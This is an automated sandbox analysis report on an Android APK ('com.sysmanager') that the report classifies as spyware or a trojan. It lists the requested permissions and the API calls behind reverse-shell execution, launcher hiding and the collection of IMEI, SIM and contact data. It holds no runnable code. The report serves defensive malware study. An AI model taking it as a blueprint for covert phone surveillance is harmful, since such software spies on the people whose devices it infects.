Source: com.sysmanager.system.AndroidSystemCall;->getAvailableExternalMemorySize:87API Call: android.os.Environment.getExternalStorageDirectory
Source: com.sysmanager.system.AndroidSystemCall;->getTotalExternalMemorySize:98API Call: android.os.Environment.getExternalStorageDirectory
Has permission to change the WIFI configuration including connecting and disconnectingShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal80.expl.spyw.troj.and@0/251@3/0
Creates SQLiteDatabase tableShow sources
Source: com.sysmanager.storage.FileSend;->onCreate:399API Call: android.database.sqlite.SQLiteDatabase.execSQL
Source: com.sysmanager.storage.Settings;->onCreate:36API Call: android.database.sqlite.SQLiteDatabase.execSQL
Reads shares settingsShow sources
Source: com.google.firebase.iid.zzh;->zzu:160API Call: "|T|108944492905|*": null
Source: com.google.firebase.iid.zzh;->zzeI:93API Call: "|S||P|": null
Source: com.google.firebase.iid.zzh;->zzeI:97API Call: "|S||K|": null
Source: com.google.android.gms.ads.identifier.AdvertisingIdClient;->getAdvertisingIdInfo:10API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.zze;->zzabS:7API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zze;->zzjt:16API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zze;->zzjx:41API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzh;->zzjy:135API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zza$zza$1;->zzbX:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zza$zzd$1;->zzbY:6API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzn;->zzcB:55API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua$zza;->zzMp:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua$zzc;->zzqm:77API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzMk:75API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzMm:87API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua;->zzMo:106API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzaL:130API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua;->zzmS:181API Call: android.content.SharedPreferences.getBoolean
Executes native commandsShow sources
Source: com.sysmanager.network.InstallApk;->installApp:33API Call: java.lang.Runtime.exec
Source: com.sysmanager.network.StartReverse;->execReverse:33API Call: java.lang.Runtime.exec
Source: com.sysmanager.utils.Commands;->executeCommands:5API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell$Interactive;->open:69API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell$Interactive;->open:122API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell;->run:49API Call: java.lang.Runtime.exec
Requests permissions only permitted to signed APKs or APKs which are within the system imageShow sources
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_FINE_LOCATION
Source: submitted apkRequest permission: android.permission.CAMERA
Source: submitted apkRequest permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.PROCESS_OUTGOING_CALLS
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.RECORD_AUDIO
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apkRequest permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
Tries to change file permissions on the native system using chmodShow sources
Source: com.sysmanager.network.StartReverse;->doInBackground:92API Call: java.io.File.<init>

Malware Analysis System Evasion:

barindex
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: classes.dexBinary or memory string: Ljava/lang/VirtualMachineError;
Accesses /procShow sources
Source: Lcom/google/android/gms/common/util/zzu;->zzdq(I)Ljava/lang/String;Method string: "/proc/"
Accesses android OS build fieldsShow sources
Source: com.sysmanager.network.HTTPUtility;->doFileUpload:95Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.HTTPUtility;->requestAESKeyToServer:304Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.HTTPUtility;->sendStringEncrypted:397Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.StartReverse;-><clinit>:12Field Access: android.os.Build.CPU_ABI
Source: com.sysmanager.system.AndroidSystemCall;->androidInfo:188Field Access: android.os.Build$VERSION.RELEASE
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:369Field Access: android.os.Build.MODEL
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:413Field Access: android.os.Build.MODEL
Source: com.sysmanager.system.AudioController;->foregroundApp:48Field Access: android.os.Build.BRAND
Source: com.sysmanager.system.RegistrationService;->getRegJson:67Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzatl;->zzLS:23Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzatl;->zzkN:38Field Access: android.os.Build.MODEL
Source: com.google.android.gms.common.util.zzj;->zzzd:39Field Access: android.os.Build.TYPE
Queries several sensitive phone informationsShow sources
Source: Lcom/google/android/gms/internal/zzaue;->zza(Lcom/google/android/gms/internal/zzatq;Ljava/lang/String;)[BMethod string: "android"
Source: Lcom/sysmanager/system/AndroidSystemCall;->phoneInfo()VMethod string: "imei"
Source: Lcom/google/android/gms/internal/zzai;-><clinit>()VMethod string: "category"
Source: Lcom/google/android/gms/internal/zzatv;->zzlD(I)Ljava/util/List;Method string: "type"
Source: Lcom/google/android/gms/internal/zzah;-><clinit>()VMethod string: "time"
Source: Lcom/sysmanager/system/RegistrationService;->getRegJson(Ljava/lang/String;)Lorg/json/JSONObject;Method string: "phone"
Source: Lcom/google/firebase/iid/zzf;->zza(Landroid/os/Bundle;Ljava/security/KeyPair;Ljava/lang/String;)VMethod string: "appid"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: com.google.android.gms.internal.zzaue;->zza:1166API Call: android.provider.Settings$Secure.getString

Hooking and other Techniques for Hiding and Protection:

barindex
Uses Crypto APIsShow sources
Source: com.google.firebase.iid.FirebaseInstanceId;->zza:46API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.iid.zzf;->zza:220API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzf;->zza:220API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzf;->zza:220API Call: java.security.MessageDigest.digest
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:11API Call: java.security.MessageDigest.getInstance
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:13API Call: java.security.MessageDigest.update
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:14API Call: java.security.MessageDigest.digest
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:11API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:14API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:18API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:30API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:33API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:35API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:45API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:48API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:50API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:60API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:63API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:64API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:74API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:77API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:78API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:15API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:16API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:17API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:22API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:23API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:24API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:214API Call: java.security.MessageDigest.getInstance
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:216API Call: java.security.MessageDigest.update
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:219API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->zza:47API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaua;->zzfH:164API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaut;->zzch:382API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzaut;->zzL:449API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaut;->zzz:963API Call: java.security.MessageDigest.digest
Source: okio.Buffer;->digest:2API Call: java.security.MessageDigest.getInstance
Source: okio.Buffer;->digest:9API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:14API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:16API Call: java.security.MessageDigest.digest
Source: okio.ByteString;->digest:33API Call: java.security.MessageDigest.getInstance
Source: okio.ByteString;->digest:35API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;-><init>:2API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSink;->hash:24API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;->write:34API Call: java.security.MessageDigest.update
Source: okio.HashingSource;-><init>:2API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSource;->hash:24API Call: java.security.MessageDigest.digest
Source: okio.HashingSource;->read:34API Call: java.security.MessageDigest.update
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS
Has permissions to monitor, redirect and/or block callsShow sources
Source: submitted apkRequest permission: android.permission.PROCESS_OUTGOING_CALLS
Queries list of running processes/tasksShow sources
Source: com.sysmanager.system.AudioController;->foregroundApp:94API Call: android.app.ActivityManager.getRunningTasks
Source: com.google.firebase.messaging.zza;->zzaca:154API Call: android.app.ActivityManager.getRunningAppProcesses
Removes its application launcher (likely to stay hidden)Show sources
Source: com.sysmanager.Main;->onCreate:16API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.sysmanager.MainWeb;->onCreate:16API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.sysmanager.OnBootReceiver;->onReceive:80API Call: android.content.pm.PackageManager.setComponentEnabledSetting

Language, Device and Operating System Detection:

barindex
Queries the SIM provider ISO country codeShow sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:399API Call: android.telephony.TelephonyManager.getSimCountryIso
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:419API Call: android.telephony.TelephonyManager.getSimCountryIso
Queries the SIM provider name (SPN - Service Provider Name)Show sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:394API Call: android.telephony.TelephonyManager.getSimOperatorName
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:418API Call: android.telephony.TelephonyManager.getSimOperatorName
Queries the SIM provider numeric MCC+MNC (mobile country code + mobile network code)Show sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:389API Call: android.telephony.TelephonyManager.getSimOperator
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:417API Call: android.telephony.TelephonyManager.getSimOperator
Queries the network operator ISO country codeShow sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:374API Call: android.telephony.TelephonyManager.getNetworkCountryIso
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:414API Call: android.telephony.TelephonyManager.getNetworkCountryIso
Queries the network operator nameShow sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:384API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:416API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Queries the network operator numeric MCC+MNC (mobile country code + mobile network code)Show sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:379API Call: android.telephony.TelephonyManager.getNetworkOperator
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:415API Call: android.telephony.TelephonyManager.getNetworkOperator
Queries the unqiue device ID (IMEI, MEID or ESN)Show sources
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:359API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:364API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:404API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:411API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:412API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:420API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: com.sysmanager.system.RegistrationService;->getRegJson:58API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.RegistrationService;->getRegJson:59API Call: android.telephony.TelephonyManager.getDeviceId

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot